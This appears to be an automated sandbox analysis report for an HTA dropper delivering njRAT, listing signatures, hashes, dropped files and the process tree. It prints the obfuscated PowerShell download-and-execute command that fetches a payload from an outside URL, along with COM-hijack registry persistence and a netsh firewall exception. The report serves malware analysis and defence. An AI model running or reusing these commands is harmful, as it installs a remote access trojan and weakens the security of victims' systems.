Analysis
-
max time kernel
150s -
max time network
160s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2022 19:13
Static task
static1
Behavioral task
behavioral1
Sample
enc2.hta
Resource
win7-20220715-en
Behavioral task
behavioral2
Sample
enc2.hta
Resource
win10v2004-20220721-en
Behavioral task
behavioral3
Sample
enc3.hta
Resource
win7-20220718-en
Behavioral task
behavioral4
Sample
enc3.hta
Resource
win10v2004-20220721-en
General
-
Target
enc3.hta
-
Size
4KB
-
MD5
586ddb57373ee157da834b1c83da00af
-
SHA1
d240d7266f86bc74817fc45556d0d4cae4424efc
-
SHA256
06769b16f5a4d86ab1c87f7811b6ed4964814cb469e01321c888dab9a2bf5696
-
SHA512
467b362ba0feed6b6a15ce2ff767bf2e2503640f05369beba98b6dd67709a632f23b0186f7c21ecd330fd4911c19a68a6fe8e51649a7a983426fd1f2222a6b0e
Malware Config
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POWERSHELL.exePOWERSHELL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4576 3968 POWERSHELL.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1140 3968 POWERSHELL.exe -
Blocklisted process makes network request 1 IoCs
Processes:
POWERSHELL.exeflow pid process 6 4576 POWERSHELL.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2412 set thread context of 1400 2412 powershell.exe aspnet_compiler.exe -
Modifies registry class 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ reg.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exepid process 4576 POWERSHELL.exe 4576 POWERSHELL.exe 4036 powershell.exe 4036 powershell.exe 1140 POWERSHELL.exe 1140 POWERSHELL.exe 2412 powershell.exe 2412 powershell.exe 2412 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exedescription pid process Token: SeDebugPrivilege 4576 POWERSHELL.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeDebugPrivilege 1140 POWERSHELL.exe Token: SeIncreaseQuotaPrivilege 4036 powershell.exe Token: SeSecurityPrivilege 4036 powershell.exe Token: SeTakeOwnershipPrivilege 4036 powershell.exe Token: SeLoadDriverPrivilege 4036 powershell.exe Token: SeSystemProfilePrivilege 4036 powershell.exe Token: SeSystemtimePrivilege 4036 powershell.exe Token: SeProfSingleProcessPrivilege 4036 powershell.exe Token: SeIncBasePriorityPrivilege 4036 powershell.exe Token: SeCreatePagefilePrivilege 4036 powershell.exe Token: SeBackupPrivilege 4036 powershell.exe Token: SeRestorePrivilege 4036 powershell.exe Token: SeShutdownPrivilege 4036 powershell.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeSystemEnvironmentPrivilege 4036 powershell.exe Token: SeRemoteShutdownPrivilege 4036 powershell.exe Token: SeUndockPrivilege 4036 powershell.exe Token: SeManageVolumePrivilege 4036 powershell.exe Token: 33 4036 powershell.exe Token: 34 4036 powershell.exe Token: 35 4036 powershell.exe Token: 36 4036 powershell.exe Token: SeDebugPrivilege 2412 powershell.exe Token: SeIncreaseQuotaPrivilege 4036 powershell.exe Token: SeSecurityPrivilege 4036 powershell.exe Token: SeTakeOwnershipPrivilege 4036 powershell.exe Token: SeLoadDriverPrivilege 4036 powershell.exe Token: SeSystemProfilePrivilege 4036 powershell.exe Token: SeSystemtimePrivilege 4036 powershell.exe Token: SeProfSingleProcessPrivilege 4036 powershell.exe Token: SeIncBasePriorityPrivilege 4036 powershell.exe Token: SeCreatePagefilePrivilege 4036 powershell.exe Token: SeBackupPrivilege 4036 powershell.exe Token: SeRestorePrivilege 4036 powershell.exe Token: SeShutdownPrivilege 4036 powershell.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeSystemEnvironmentPrivilege 4036 powershell.exe Token: SeRemoteShutdownPrivilege 4036 powershell.exe Token: SeUndockPrivilege 4036 powershell.exe Token: SeManageVolumePrivilege 4036 powershell.exe Token: 33 4036 powershell.exe Token: 34 4036 powershell.exe Token: 35 4036 powershell.exe Token: 36 4036 powershell.exe Token: SeIncreaseQuotaPrivilege 4036 powershell.exe Token: SeSecurityPrivilege 4036 powershell.exe Token: SeTakeOwnershipPrivilege 4036 powershell.exe Token: SeLoadDriverPrivilege 4036 powershell.exe Token: SeSystemProfilePrivilege 4036 powershell.exe Token: SeSystemtimePrivilege 4036 powershell.exe Token: SeProfSingleProcessPrivilege 4036 powershell.exe Token: SeIncBasePriorityPrivilege 4036 powershell.exe Token: SeCreatePagefilePrivilege 4036 powershell.exe Token: SeBackupPrivilege 4036 powershell.exe Token: SeRestorePrivilege 4036 powershell.exe Token: SeShutdownPrivilege 4036 powershell.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeSystemEnvironmentPrivilege 4036 powershell.exe Token: SeRemoteShutdownPrivilege 4036 powershell.exe Token: SeUndockPrivilege 4036 powershell.exe Token: SeManageVolumePrivilege 4036 powershell.exe Token: 33 4036 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.execmd.execmd.exepowershell.exeaspnet_compiler.exedescription pid process target process PID 4576 wrote to memory of 4036 4576 POWERSHELL.exe powershell.exe PID 4576 wrote to memory of 4036 4576 POWERSHELL.exe powershell.exe PID 4036 wrote to memory of 3800 4036 powershell.exe WScript.exe PID 4036 wrote to memory of 3800 4036 powershell.exe WScript.exe PID 1140 wrote to memory of 5068 1140 POWERSHELL.exe cmd.exe PID 1140 wrote to memory of 5068 1140 POWERSHELL.exe cmd.exe PID 5068 wrote to memory of 5052 5068 cmd.exe reg.exe PID 5068 wrote to memory of 5052 5068 cmd.exe reg.exe PID 5068 wrote to memory of 4528 5068 cmd.exe reg.exe PID 5068 wrote to memory of 4528 5068 cmd.exe reg.exe PID 5068 wrote to memory of 860 5068 cmd.exe cmd.exe PID 5068 wrote to memory of 860 5068 cmd.exe cmd.exe PID 860 wrote to memory of 2412 860 cmd.exe powershell.exe PID 860 wrote to memory of 2412 860 cmd.exe powershell.exe PID 2412 wrote to memory of 1400 2412 powershell.exe aspnet_compiler.exe PID 2412 wrote to memory of 1400 2412 powershell.exe aspnet_compiler.exe PID 2412 wrote to memory of 1400 2412 powershell.exe aspnet_compiler.exe PID 2412 wrote to memory of 1400 2412 powershell.exe aspnet_compiler.exe PID 2412 wrote to memory of 1400 2412 powershell.exe aspnet_compiler.exe PID 2412 wrote to memory of 1400 2412 powershell.exe aspnet_compiler.exe PID 2412 wrote to memory of 1400 2412 powershell.exe aspnet_compiler.exe PID 2412 wrote to memory of 1400 2412 powershell.exe aspnet_compiler.exe PID 1400 wrote to memory of 2976 1400 aspnet_compiler.exe netsh.exe PID 1400 wrote to memory of 2976 1400 aspnet_compiler.exe netsh.exe PID 1400 wrote to memory of 2976 1400 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HAAEOALBRXAIOCSRBGSCEDW = '[\<5<_!]70#&-5)7@5(59]4y\<5<_!]70#&-5)7@5(59]4t(_*)})-[*\[/(%/0^!%{(@<{3%\$}7!6&14]}&1*=57[.IO.\<5<_!]70#&-5)7@5(59]4t_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}<{3%\$}7!6&14]}&1*=57[_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}d(_*)})-[*\[/(%/0^!%{(@_13[9$#[<1/}#^#2^8$$[)]'.Replace('\<5<_!]70#&-5)7@5(59]4','S').Replace('(_*)})-[*\[/(%/0^!%{(@','E').Replace('_13[9$#[<1/}#^#2^8$$[)','R').Replace(']61=$}4}}4^7<*&/@!%+\}','A').Replace('<{3%\$}7!6&14]}&1*=57[','M');$HLTYLQWQUSUZZXXCFYGBYAD = ($HAAEOALBRXAIOCSRBGSCEDW -Join '')|&('I'+'EX');$HZJDPHHLCFDWDOVEILVRHQQ = '[07^[^&[4<5=268_/]+1(-!y07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<_/$_4}0]/-)5%[/3\9@[email protected]_/$_4}0]/-)5%[/3\9@76@02=(]2+25)4/&*#[$2}36<.W_/$_4}0]/-)5%[/3\9@76@bR_/$_4}0]/-)5%[/3\9@76@qu_/$_4}0]/-)5%[/3\9@76@07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<]'.Replace('07^[^&[4<5=268_/]+1(-!','S').Replace('_/$_4}0]/-)5%[/3\9@76@','E').Replace('02=(]2+25)4/&*#[$2}36<','T');$HGWVOWBJIRKOZPAZDHKCXFR = ($HZJDPHHLCFDWDOVEILVRHQQ -Join '')|&('I'+'EX');$HATKNHVTWEYFZVGJTJKPOJF = '<&]4^<529_}0((#90_50&$r0*)$60%](_0*8%7$%{4&\_a[#}02[3_+}(*7!^3}[*#350*)$60%](_0*8%7$%{4&\_'.Replace('<&]4^<529_}0((#90_50&$','C').Replace('0*)$60%](_0*8%7$%{4&\_','E').Replace('[#}02[3_+}(*7!^3}[*#35','T');$HIGJPHAPDSYPKOSVELGREOR = '<2!\3]6!6<&_+7)[9)}\/^<+8]/@<9<^(+${/4-7%@)(tR<+8]/@<9<^(+${/4-7%@)(1*)9%/*/(56%3__7\}!\11pon1*)9%/*/(56%3__7\}!\11<+8]/@<9<^(+${/4-7%@)('.Replace('<2!\3]6!6<&_+7)[9)}\/^','G').Replace('<+8]/@<9<^(+${/4-7%@)(','E').Replace('1*)9%/*/(56%3__7\}!\11','S');$HRFXTROBLKIFECVKROLDLJL = 'G&/+0%*9_1+*1&)^)2$3<+(t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%pon21{}\5[($(]@_+8_\1+1\%&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(am'.Replace('21{}\5[($(]@_+8_\1+1\%','S').Replace('&/+0%*9_1+*1&)^)2$3<+(','E').Replace('(+<</9]!8<4(%}5)_9!{*7','R');$HPLYZILQXYLUTLCHOFQSIZE = '}_5)50/8//-/@10^)<{_$(\/5+^${{)\1@]!}04*@126a}&%406_!1]{7-7^%}&%50[To\/5+^${{)\1@]!}04*@126n}&%406_!1]{7-7^%}&%50['.Replace('}_5)50/8//-/@10^)<{_$(','R').Replace('\/5+^${{)\1@]!}04*@126','E').Replace('}&%406_!1]{7-7^%}&%50[','D');&('I'+'EX')($HLTYLQWQUSUZZXXCFYGBYAD::new($HGWVOWBJIRKOZPAZDHKCXFR::$HATKNHVTWEYFZVGJTJKPOJF('https://tradeguru.com.pk/Server3.txt').$HIGJPHAPDSYPKOSVELGREOR().$HRFXTROBLKIFECVKROLDLJL()).$HPLYZILQXYLUTLCHOFQSIZE())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE3⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1Filesize
604KB
MD5ab1fce3ab2f6f211da8f8dc30c2b3060
SHA1ae0dff660b20f9209a66029d44b048a63cc80336
SHA2567cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca
SHA512ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.batFilesize
706B
MD51a2189e850187ca0cfadf5eba71bf87b
SHA1022de59e2f7a4ada62a34c701d35a8f6b738a140
SHA256d19e4c732fd1125438cb1d7e2278d9420fad7d3e66fcc6c56879258364664997
SHA5129acf6053091a18388b9da45ea7147b71bbeb3acda7697d311ce9a416578595427ec3661a41c09abed75ae155d11c15b3573883effa25eeb86cfbf93eb515d49d
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1Filesize
3KB
MD51fe311d146874fa10f4eedf9941dabd4
SHA14ea8f6f1fcc57a1cba5b388e11df6c3a58fc9709
SHA256804d3783e70a5a575eeb0e7d617186bd1f8dcbd3244a736521194948fa80ea1d
SHA5127a70c224d707ff7a723daa86ded140987fbf52d38a2c1cdacc1d04c53c447b78fa5cb49843eeebf126fa95cb72b44f436581b383ebde645ab53105d5f8fc74bb
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbsFilesize
1KB
MD58b0c7083e7b7bb3a886e13dcd0830ba9
SHA1444748aad7b9289f1b371aaac955c0554ca62d17
SHA25645bbe8aafd1246fa15881a63f3cb8997a35cfc3e78ba306fc5abbaf72cf2867e
SHA512d23a9aa4d91231b26eca8c61a6487e9f151be19a45ce7a8bfb818ebd16803cfad219ae594cfb57263e7044e9f73d3705239267345f0e03a7e478f196938d3c89
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.logFilesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD50ab03b4ab0ee8273a1eea28cef1ca1e7
SHA18a305ca40e71bd2b04b20c65e28730e3ff3f50b2
SHA256695a48145171a84d61778fe33c410d3195109c7c59a2b1038a1f3ca14c52a3ed
SHA5127347810d3c514b343def26aa42e4b758fc1cdd8a9e57c529de49615b995c8c1dab942d83d432a5ee6e022bbefd020d6b1d920ffa61a9ca2617ff8b67ce3c4f72
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5bc34f67b09ef76be9c393b6fb6508a35
SHA17c59c76b6afb72f268e07e1c8ec7dd7f3860ebdb
SHA2568d8540e29fff09fbed6d44d34adbe5c89c005a6c7b44426dce62dcdd1bd414c6
SHA5124a0ffb8c01a44edd58d92473a2b1fe169dd669d4821b7bc0617f03f1b646788a7db76f4c08b447f87a54c787d49b90560e0f97bccf88019e68300d5ddeeb387f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
memory/860-142-0x0000000000000000-mapping.dmp
-
memory/1140-157-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmpFilesize
10.8MB
-
memory/1140-144-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmpFilesize
10.8MB
-
memory/1400-156-0x00000000053A0000-0x000000000543C000-memory.dmpFilesize
624KB
-
memory/1400-158-0x00000000059F0000-0x0000000005F94000-memory.dmpFilesize
5.6MB
-
memory/1400-159-0x00000000054E0000-0x0000000005572000-memory.dmpFilesize
584KB
-
memory/1400-152-0x000000000040BBBE-mapping.dmp
-
memory/1400-161-0x00000000059D0000-0x00000000059DA000-memory.dmpFilesize
40KB
-
memory/1400-151-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1400-162-0x0000000006240000-0x00000000062A6000-memory.dmpFilesize
408KB
-
memory/2412-154-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmpFilesize
10.8MB
-
memory/2412-146-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmpFilesize
10.8MB
-
memory/2412-143-0x0000000000000000-mapping.dmp
-
memory/2976-160-0x0000000000000000-mapping.dmp
-
memory/3800-136-0x0000000000000000-mapping.dmp
-
memory/4036-147-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmpFilesize
10.8MB
-
memory/4036-133-0x0000000000000000-mapping.dmp
-
memory/4036-135-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmpFilesize
10.8MB
-
memory/4528-141-0x0000000000000000-mapping.dmp
-
memory/4576-130-0x000001EC78BD0000-0x000001EC78BF2000-memory.dmpFilesize
136KB
-
memory/4576-150-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmpFilesize
10.8MB
-
memory/4576-132-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmpFilesize
10.8MB
-
memory/4576-131-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmpFilesize
10.8MB
-
memory/5052-140-0x0000000000000000-mapping.dmp
-
memory/5068-138-0x0000000000000000-mapping.dmp